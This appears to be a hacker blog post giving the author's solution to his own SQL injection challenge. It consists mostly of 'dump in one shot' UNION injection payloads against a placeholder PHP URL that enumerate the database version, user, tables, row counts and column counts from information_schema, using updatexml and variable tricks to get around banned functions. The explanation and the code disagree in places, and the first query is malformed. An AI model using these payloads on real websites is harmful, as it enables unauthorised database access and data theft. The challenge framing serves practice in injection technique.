Header Ads

Header ADS

Kashmiri_Wolf]Sqli Challenge 12[Solution]

Kashmiri_Wolf]Sqli Challenge 12[Solution]

  Ok I Guess This Is The Moment Most OF You Guys Were Waiting For ! Here Is Solution Of My 12th Challenge !

Here Is Link
Challenge No 12

Lets Have A Look At Tasks Vs Rules

Tasks :

1.Print Your Name with Version
2.Print User And DB
3.Print Tables Starting With 'a' With Their Records
4.Print Other Tables
5.Non Of Your Table Should Repeat
6.Get Table Records And No Of Columns For Other Tables which are not starting with 'a'
7.Skip The Table Where Records are zero(Not Starting With A) and Show That Table Which Is Skipped And Show That In Preformatted Text (Check PoC)

Rules :
Use Dios
You May Not Use Replace,Insert,concat_ws,group_concat,make_set,export_set
You May Use concat(Once For Dios Only)
You May Not Try To Manipulate Data To get Tasks 3 and 4 By using some limiting functions
You Query May Not Contain More Than 4 Selects (+1 For UniON SelEct)
You May Not Declare More Than One Variable(Only For Dios)
You May Not Use count() more than once
Dont Use any Function Before Dios's concat
Dont Use Like/Regexp/find_in_set/position/locate function For Task 3
Dont Use group by/order by

PS:

Nested Function Is allowed But For Dios Use Only Concat

I Will Just Explain Task 3,4,7

Lets Start :

We Will Use Mostly If Function Here

if(condition,if_true,if_false)

Lets Dios First


PHP Code:
site.com/some.php?some=5 union select 1,2,3(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.tables)where(table_schema=database())and(@a)in(@a:=concat(@a,table_name,'<br>'))))a),5,6-- - 


ok its working

Lets Print Those Tables Which Are Starting With A
For That We Will Use Left()
Fucntion

Left(str,length)


PHP Code:
(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.tables)where(table_schema=database())
and(@
a)in(@a:=concat(@a,if(left(table_name,1)='c',table_name,0x00)))))a


Now Lets Print Table Records With Tables Starting with 'A'


PHP Code:
(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.tables)where(table_schema=database())
and(@
a)in(@a:=concat(@a,if(left(table_name,1)='a',updatexml(updatexml('<br/><b></b> :: Table Records ~~>
<c></c>'
,'/b',table_name),'/c',table_rows),0x00)))))a


Now Lets Complete The Tasks "if table_rows = 0 skip them and print them in preformated Text"

For This We Will Use if(table_rows=0,concat('<pre>Table ',table_name,' Skipped</pre>'),0x00)

But We Cant Use Concat here because its blocked in rules so lets use "updatexml()"

And Here's The Final Query


PHP Code:
(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.tables)where(table_schema=database())
and(@
a)in(@a:=concat(if(@a=0x00,'Kashmiri_Wolf ::',0x00),if(@a=0x00,version(),0x00),if(@a=0x00,'<br>',0x00),
if(@
a=0x00,user(),0x00),if(@a=0x00,'<br>',0x00),if(@a=0x00,database(),0x00),if(@a=0x00,'<br>',0x00),if(@a=0x00,'<br>',0x00),if(@a=0x00,'Tables Starting With A <br> ',0x00),@a,if(left(table_name,1)='c',updatexml(updatexml('<b></b>
:: Table Records ~~> <c></c>'
,'/b',table_name),'/c',table_rows),if(table_rows=0,updatexml(updatexml('<br /><pre />Table
:: "<a></a><b></b>'
,+'/a',table_name),'/b','" Skipped</pre>'),updatexml(updatexml(updatexml('<font color=red>Other Tables
~~> </font><a></a><font color=red > :: Table Records ~~> </font><b></b><font color=red > No Of Columns ~~> </font><c></c>'
,'/a',@Col:=table_name),'/b',table_rows),'/c',(select count(*) from information_schema.columns where table_name=@Col)))),0x3c62723e))))a



Sorry For Not Explaining It Much ******.  A Lil Time  ******. So Hope You Guys Can Understand

Greetz To r0ot h3x49,makman,benzi,rummy,ajkaro,cybrhckr,master Sniper,Cheetah


Regards

Kashmiri_Wolf


Allah Hafiz !

No comments

Powered by Blogger.